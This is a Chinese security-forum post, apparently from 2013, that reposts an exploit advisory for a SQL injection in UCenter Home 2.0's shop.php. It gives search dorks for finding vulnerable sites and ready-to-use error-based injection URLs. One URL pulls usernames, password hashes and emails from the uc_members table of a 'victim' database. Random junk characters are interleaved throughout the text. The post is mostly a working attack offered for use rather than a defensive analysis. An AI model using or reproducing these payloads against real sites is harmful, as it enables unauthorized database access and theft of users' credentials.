找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2017|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 e* z6 G9 z7 S8 L% @; R__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
) w1 Z5 X  A) D" Y9 I3 w/ s* ~- ^/ l) H/ ]/ w4 \$ B- k0 b
                                 ( N8 q' ^5 a8 b* k- U/ ~( J8 P. W

) x3 l% w' _; L- ]*/ Author : KnocKout  0 |$ F. e/ R5 _* `- d8 L/ Z

6 T+ L3 J/ T8 K9 G# v*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  ( h) u+ [, P& }' d+ O( j. l9 B
8 P; X) w  K) [( Q
*/ Contact: knockoutr@msn.com  
3 X' S- O- R" ?' T* h& |$ A) ]* \% T1 l( ~. N0 I4 d' Y4 @/ y
*/ Cyber-Warrior.org/CWKnocKout  
* t6 M$ k. d* j' N
# v) x0 Z# n/ a__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  8 @6 x! v+ F+ ~% Y
& e( L$ ^# v% }/ X+ o
Script : UCenter Home  
2 K* H/ E* l! a2 @% A- J* I
; n# b' G8 F: tVersion : 2.0  
4 V0 u6 y5 U6 B2 V
# K0 [( W" W% i$ R3 I6 D. {2 _: X0 kScript HomePage : http://u.discuz.net/  
! T, l4 h. [* K" |* p) x
6 D1 Y: @! k  q9 \" N__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
  d; l+ B/ m' h2 F, F0 ?2 w7 u- [8 W4 v. K* G9 a3 q; J8 ~. E: ]
Dork : Powered by UCenter inurl:shop.php?ac=view  4 P7 m' l" M7 m' b, E% E3 F1 a

* T/ d2 y6 z4 h) h: I1 ?8 T9 _8 `1 PDork 2 : inurl:shop.php?ac=view&shopid=  
  t( y; m$ X- e6 A. E: Y3 b  S/ |" [2 G& g. p+ f6 l+ e6 e* @# U( h
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
4 ^  d; `; H& Z5 f; b  y
0 m% l# ^# {" l+ i. N  FVuln file : Shop.php  
8 T$ B# Z  i) N8 R& m) h* d& o! e1 ^1 K  M
value's : (?)ac=view&shopid=  
* D: L  f! C+ d% K6 E" t) y% r2 D# k3 a- z' E* }/ l( A7 [
Vulnerable Style : SQL Injection (MySQL Error Based)  
* F7 [# H8 H8 c  q
9 [5 C6 W6 w2 J4 CNeed Metarials : Hex Conversion  5 d" x- s- K; |- Z! l
) {3 D3 a# o6 I5 E# ^7 I, ~
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  5 k6 [/ p. J) ~* D/ j* T

6 t: h$ z6 ?1 B- OYour Need victim Database name.   3 {+ p' J0 _3 Z; g* u

5 I  \! f7 }5 m1 c1 Xfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
' g1 N" R" C% T& e- K' h* O6 D5 y5 v* j8 e
..  
2 {7 e8 k- t- J$ z3 M2 p2 Z7 P# D& }% ]8 W
DB : Okey.  
3 T# n+ g8 S% Y. f9 k! x& m
7 `. q0 g# _5 M* Lyour edit DB `[TARGET DB NAME]`  
# Z* B4 w& o/ M$ c2 O5 }% O0 x3 U% f7 c6 I1 v* D' z
Example : 'hiwir1_ucenter'  
: y2 @9 @' ~" E
7 j' |- }) N5 W( ^7 H7 [Edit : Okey.    f8 X" [$ G. h! E: @

) r: E0 d4 o& R7 j! `( l8 k# z+ X' GYour use Hex conversion. And edit Your SQL Injection Exploit..  * V( E  o' z; L* F# I
3 `+ z4 z: c9 C4 T- x
   4 A3 ?6 ?( Z- q* G) l
) a" M+ Z8 ?1 F7 o4 V1 R3 b
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  . X4 k& `: U' u$ R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表